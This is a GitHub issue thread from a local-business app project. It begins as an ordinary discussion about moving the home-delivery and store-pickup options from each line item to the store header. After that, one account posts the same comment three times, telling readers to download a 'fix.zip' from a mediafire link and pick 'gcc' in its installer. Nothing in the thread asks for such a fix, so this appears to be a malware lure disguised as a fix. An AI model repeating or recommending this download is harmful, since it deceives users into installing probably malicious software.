### ISSUE TITLE
home delivery/store pickup

### ISSUE THREAD

**Issue by amarkalale** [IntentBrowser/localbiz#11]
This is very confusing.

1. This is being shown against each line. We should show this in header for store.

Unless, we accept, pickup or home delivery as enterable at header level, we should not show this.

**Comment by venkatramanm** [comment]
We moved this to header with information that user supports home delivery , cod etc..

**Comment by Gamez2** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Gamez2** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Gamez2** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."
